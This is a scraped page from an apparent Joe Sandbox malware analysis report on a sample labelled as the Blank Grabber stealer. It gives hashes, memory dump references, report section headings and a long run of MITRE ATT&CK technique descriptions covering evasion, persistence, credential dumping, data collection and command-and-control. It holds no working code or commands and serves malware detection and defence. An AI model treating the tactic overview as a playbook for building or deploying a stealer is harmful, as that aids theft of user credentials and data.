Joe Sandbox IDA Plugin

Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: be01d8f0f76930eb71a84b43eb64ac89f440c7749710fc0ee8f0a406c460134c
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: D0E04652F1930281ED782763285127D02802F6AB80F5464BECD1FC7382ED2EA4B92603

Function 00007FF6D7EF1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF6D7EF1958

Memory Dump Source

Source File: 00000053.00000002.2145809940.00007FF6D7ED1000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF6D7ED0000, based on PE: true

Associated: 00000053.00000002.2145768157.00007FF6D7ED0000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145961692.00007FF6D7F40000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2145997517.00007FF6D7F58000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146031386.00007FF6D7F59000.00000008.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F5A000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F64000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F6E000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146066073.00007FF6D7F76000.00000004.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146235048.00007FF6D7F78000.00000002.00000001.01000000.00000022.sdmpDownload File
Associated: 00000053.00000002.2146294833.00007FF6D7F7E000.00000002.00000001.01000000.00000022.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_83_2_7ff6d7ed0000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: ac782fbfd6585e38f34c3e210c10df7d1b7ac33a9d792d58a021fc74007e294c
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: C0F0AF22A0864A45FB348B69E44037CA661DB10BB8F985332D63DC64D8CF7CD9A2C792

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report El9HaBFrFM.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Blank Grabber

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bound.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Windows Analysis Report
El9HaBFrFM.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre